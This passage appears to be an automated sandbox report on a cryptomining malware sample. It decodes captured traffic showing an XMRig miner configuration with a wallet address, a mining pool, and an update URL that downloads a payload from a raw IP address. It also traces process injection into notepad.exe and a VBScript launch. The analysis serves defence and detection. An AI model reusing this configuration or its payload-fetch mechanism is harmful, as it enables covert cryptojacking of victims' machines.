                                                                                                                                        Data Raw: 5b 4d 69 6e 65 72 5d 0a 61 64 64 72 65 73 73 3d 34 38 51 62 50 5a 55 74 57 6d 38 67 47 36 54 36 65 67 36 48 37 4a 47 58 61 44 36 65 4e 4a 48 38 6f 33 52 6f 79 4c 67 42 65 71 79 6d 37 54 78 79 64 55 39 54 66 4d 66 55 55 67 61 68 65 71 61 37 42 46 64 68 74 66 62 39 64 36 36 35 43 67 59 44 6a 36 66 35 4b 76 64 6a 4c 65 47 4a 6d 64 57 2e 57 4f 52 4b 45 52 2f 70 69 63 6b 74 75 74 6f 73 09 09 09 3b 20 58 4d 52 20 61 64 64 72 65 73 73 2c 20 65 6d 61 69 6c 20 28 6d 69 6e 65 72 67 61 74 65 29 2c 20 62 74 63 20 61 64 64 72 65 73 73 20 28 6e 69 63 65 68 61 73 68 29 2c 20 65 74 63 2e 0a 70 6f 6f 6c 70 6f 72 74 3d 78 6d 72 2d 75 73 2d 65 61 73 74 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 3a 31 34 34 34 34 09 09 3b 20 44 6f 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 73 74 72 61 74 75 6d 2b 74 63 70 3a 2f 2f 27 20 65 2e 67 20 6d 6f 6e 65 72 6f 68 61 73 68 2e 63 6f 6d 3a 33 33 33 33 0a 70 61 73 73 77 6f 72 64 3d 09 09 09 09 3b 20 50 6f 6f 6c 20 70 61 73 73 77 6f 72 64 0a 73 74 6f 70 3d 30 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 74 6f 20 73 74 6f 70 20 6d 69 6e 65 72 2e 20 49 66 20 6e 6f 74 20 73 70 65 63 69 66 69 65 64 20 6f 72 20 65 71 75 61 6c 20 74 6f 20 22 30 22 20 6d 69 6e 65 72 20 77 69 6c 6c 20 77 6f 72 6b 2e 20 0a 70 72 6f 78 79 3d 30 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 69 66 20 79 6f 75 20 61 72 65 20 6d 69 6e 69 6e 67 20 74 6f 20 78 6d 72 69 67 2d 70 72 6f 78 79 20 69 6e 73 74 65 61 64 20 6f 66 20 70 6f 6f 6c 2e 20 54 68 69 73 20 65 6e 61 62 6c 65 73 20 75 73 69 6e 67 20 61 20 75 6e 71 69 75 65 20 61 64 64 72 65 73 73 20 70 65 72 20 77 6f 72 6b 65 72 20 66 6f 72 20 62 65 74 74 65 72 20 6d 69 6e 65 72 20 6d 6f 6e 69 74 6f 72 69 6e 67 2e 0a 6b 65 65 70 61 6c 69 76 65 3d 30 09 09 09 09 3b 20 30 20 74 6f 20 64 69 73 61 62 6c 65 20 6b 65 65 70 61 6c 69 76 65 2c 20 31 20 74 6f 20 65 6e 61 62 6c 65 20 6b 65 65 70 61 6c 69 76 65 0a 0a 5b 55 70 64 61 74 65 5d 0a 3b 63 6f 6e 66 69 67 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 78 6d 72 6d 69 6e 65 72 2e 6e 65 74 2f 63 6f 6e 66 69 67 2e 74 78 74 20 20 20 09 3b 20 59 6f 75 20 63 61 6e 20 75 70 64 61 74 65 20 74 68 65 20 75 72 6c 20 74 68 61 74 20 70 6f 69 6e 74 73 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 69 6c 65 2e 20 4d 75 73 74 20 62 65 67 69 6e 20 77 69 74 68 20 22 68 74 74 70 3a 2f 2f 22 20 6f 72 20 22 68 74 74 70 73 3a 2f 2f 22 20 0a 6b 6e 6f 63 6b 5f 74 69 6d 65 3d 33 30 20 09 09 09 09 20 20 20 20 20 09 3b 20 4e 75 6d 62 65 72 20 6f 66 20 6d 69 6e 75 74 65 73 20 74 68 65 20 6d 69 6e 65 72 20 77 61 69 74 73 20 62 65 74 77 65 65 6e 20 76 69 73 69 74 73 20 74 6f 20 63 6f 6e 66 69 67 20 66 69 6c 65 2e 20 49 66 20 6e 65 76 65 72 20 73 70 65 63 69 66 69 65 64 2c 20 64 65 66 61 75 6c 74 20 69 73 20 33 30 20 6d 69 6e 75 74 65 73 2e 20 0a 75 70 64 61 74 65 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 34 35 2e 31 34 34 2e 32 32 35 2e 31 33 35 2f 6e 6f 74 65 70 61 64 2e 65 78 65 09 09 3b 20 75 72 6c 20 6f 66 20 6e 65 77 20 6d 69 6e 65 72 2e 20 4d 69 6e 65 72 20 77 69 6c
                                                                                                                                        Data Ascii: [Miner]address=48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos; XMR address, email (minergate), btc address (nicehash), etc.poolport=xmr-us-east1.nanopool.org:14444; Do not include 'stratum+tcp://' e.g monerohash.com:3333password=; Pool passwordstop=0; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work. proxy=0; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.keepalive=0; 0 to disable keepalive, 1 to enable keepalive[Update];config_url=http://xmrminer.net/config.txt ; You can update the url that points to the configuration file. Must begin with "http://" or "https://" knock_time=30 ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes. update_url=http://45.144.225.135/notepad.exe; url of new miner. Miner wil
                                                                                                                                        Jul 14, 2021 07:04:11.392072916 CEST1406INData Raw: 6c 20 67 65 74 20 75 70 64 61 74 65 64 20 77 69 74 68 20 74 68 69 73 20 66 69 6c 65 2e 20 0a 75 70 64 61 74 65 5f 68 61 73 68 3d 39 64 62 63 66 31 38 33 37 36 32 38 37 32 64 38 39 31 37 62 38 61 31 39 35 33 35 61 30 63 36 35 09 09 09 09 3b 20 6d
                                                                                                                                        Data Ascii: l get updated with this file. update_hash=9dbcf183762872d8917b8a19535a0c65; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!;End


                                                                                                                                        Code Manipulations

                                                                                                                                        Statistics

                                                                                                                                        CPU Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        Memory Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        High Level Behavior Distribution

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        Analysis Process: P7Oa6i5muL.exe PID: 4116 Parent PID: 5572

                                                                                                                                        General

                                                                                                                                        Start time:07:03:53
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Users\user\Desktop\P7Oa6i5muL.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Users\user\Desktop\P7Oa6i5muL.exe'
                                                                                                                                        Imagebase:0x8b0000
                                                                                                                                        File size:2241536 bytes
                                                                                                                                        MD5 hash:9DBCF183762872D8917B8A19535A0C65
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:low

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 2396 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:03:59
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: P7Oa6i5muL.exe PID: 2492 Parent PID: 4116

                                                                                                                                        General

                                                                                                                                        Start time:07:04:04
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        Imagebase:0x840000
                                                                                                                                        File size:2241536 bytes
                                                                                                                                        MD5 hash:9DBCF183762872D8917B8A19535A0C65
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.470611042.0000000003320000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 21%, ReversingLabs
                                                                                                                                        Reputation:low

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: jwMZjhPggeDR.exe PID: 2520 Parent PID: 2492

                                                                                                                                        General

                                                                                                                                        Start time:07:04:05
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe
                                                                                                                                        Imagebase:0x11e0000
                                                                                                                                        File size:909312 bytes
                                                                                                                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000000.221202486.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000000.224986002.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000000.229478984.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        Reputation:moderate

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: notepad.exe PID: 2168 Parent PID: 2492

                                                                                                                                        General

                                                                                                                                        Start time:07:04:11
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\notepad.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
                                                                                                                                        Imagebase:0x7ff6dc290000
                                                                                                                                        File size:245760 bytes
                                                                                                                                        MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.456029595.0000018420035000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 3376 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:22
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 1064 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:24
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: cmd.exe PID: 6140 Parent PID: 2492

                                                                                                                                        General

                                                                                                                                        Start time:07:04:28
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: conhost.exe PID: 1092 Parent PID: 6140

                                                                                                                                        General

                                                                                                                                        Start time:07:04:29
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: wscript.exe PID: 3888 Parent PID: 6140

                                                                                                                                        General

                                                                                                                                        Start time:07:04:29
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                                                                                                                                        Imagebase:0x1270000
                                                                                                                                        File size:147456 bytes
                                                                                                                                        MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 5636 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:35
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 2292 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:36
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 5400 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:36
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 3112 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:37
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 3260 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:37
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 3544 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:37
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: SgrmBroker.exe PID: 1724 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:38
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                        Imagebase:0x7ff6f6090000
                                                                                                                                        File size:163336 bytes
                                                                                                                                        MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 5884 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:39
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: svchost.exe PID: 3016 Parent PID: 568

                                                                                                                                        General

                                                                                                                                        Start time:07:04:52
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff7488e0000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: MpCmdRun.exe PID: 1832 Parent PID: 5884

                                                                                                                                        General

                                                                                                                                        Start time:07:05:40
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                                        Imagebase:0x7ff7f0b50000
                                                                                                                                        File size:455656 bytes
                                                                                                                                        MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: conhost.exe PID: 4676 Parent PID: 1832

                                                                                                                                        General

                                                                                                                                        Start time:07:05:41
                                                                                                                                        Start date:14/07/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Chronological Activities

                                                                                                                                        Disassembly

                                                                                                                                        Code Analysis

                                                                                                                                        Reset < >

                                                                                                                                          Analysis Process: P7Oa6i5muL.exe PID: 4116 Parent PID: 5572 P7Oa6i5muL.exeCOMMON

                                                                                                                                          Executed Functions

                                                                                                                                          Function 073BBEC5, Relevance: 2.0, Strings: 1, Instructions: 797COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230295899.00000000073B0000.00000040.00000001.sdmp, Offset: 073B0000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: D
                                                                                                                                          • API String ID: 0-2746444292
                                                                                                                                          • Opcode ID: 8c29aacfb7e5d82d5853e06031eb13d1b8e2013ff5888594ad4b434b92d3de13
                                                                                                                                          • Instruction ID: 527409e70ed7958249f334849d06343695d507deb045e1986b04ff4d36a1b64e
                                                                                                                                          • Opcode Fuzzy Hash: 8c29aacfb7e5d82d5853e06031eb13d1b8e2013ff5888594ad4b434b92d3de13
                                                                                                                                          • Instruction Fuzzy Hash: 2F7216B4A102188FDB64EF68D894B9AB7F2FF88300F1484A9E50ADB755DB349D81CF51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 0729D270, Relevance: .7, Instructions: 680COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 750581f5a8e64c28e7efc5ad449b06d8ca0da7bbc05b8efa9082b24ba9acb8d1
                                                                                                                                          • Instruction ID: e6bf317611ca1e863bc7f60225e5457959a1daaf7b7910ab1526d95374228d79
                                                                                                                                          • Opcode Fuzzy Hash: 750581f5a8e64c28e7efc5ad449b06d8ca0da7bbc05b8efa9082b24ba9acb8d1
                                                                                                                                          • Instruction Fuzzy Hash: C55259B5A10606DFCB14DF68D5849AAFBF2FF48310B198969D84A8B752C734FC41DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 0729E680, Relevance: .6, Instructions: 637COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7919c6503adcc55c5eaf3337f5b05a1f19766afdbcd97f8404dc3c03ff84521c
                                                                                                                                          • Instruction ID: c9eef66459536368b7150b1fd802362bfbcc66b8f33c4b404792008985f0029e
                                                                                                                                          • Opcode Fuzzy Hash: 7919c6503adcc55c5eaf3337f5b05a1f19766afdbcd97f8404dc3c03ff84521c
                                                                                                                                          • Instruction Fuzzy Hash: 844259B0B102469FDB14DF78C494A6ABBF2BF89304F1A8869D4469B3A1DB34EC41CB51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 07299070, Relevance: .6, Instructions: 629COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ff4fcd89d8d79d9ae536089f3177ad9b480b347f5b6b795bfe84557917aec67a
                                                                                                                                          • Instruction ID: 04ea07b62939969e2cea54e46bf19a7b155608a6d2020c35bdf438b097e3b652
                                                                                                                                          • Opcode Fuzzy Hash: ff4fcd89d8d79d9ae536089f3177ad9b480b347f5b6b795bfe84557917aec67a
                                                                                                                                          • Instruction Fuzzy Hash: B3428BB0A10246DFCB248F39D58866AB7F6BF85325F18847DE496CB790DB35E881CB10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 0729DF10, Relevance: .5, Instructions: 456COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dccf3c48f96aa1530dd66115a2e201db5c0c026bee11041e331025cbf627566f
                                                                                                                                          • Instruction ID: bbc447eaf8143ebd2f8d8861392408ea4e4eebbdb1a9a5ceda48e2011358824b
                                                                                                                                          • Opcode Fuzzy Hash: dccf3c48f96aa1530dd66115a2e201db5c0c026bee11041e331025cbf627566f
                                                                                                                                          • Instruction Fuzzy Hash: 43129EB5A102459FCB04DF69C5849AABBF2FF89304F1AC4A9E449DB362D734ED41CB60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 07296F02, Relevance: .4, Instructions: 408COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.230258842.0000000007290000.00000040.00000001.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d5478ce19325892d1b5b83a654165dca63edfa68e953fc855b7adb3202740638
                                                                                                                                          • Instruction ID: 7ebe9d86368e04059e293c4f7daec8563aad9722755fcdb3777d4eb01ce569d5
                                                                                                                                          • Opcode Fuzzy Hash: d5478ce19325892d1b5b83a654165dca63edfa68e953fc855b7adb3202740638
                                                                                                                                          • Instruction Fuzzy Hash: F9F14FB4A20209DFDB08DFB5D854AADBBB2FF88304F158469E4069B355DB35EC46CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

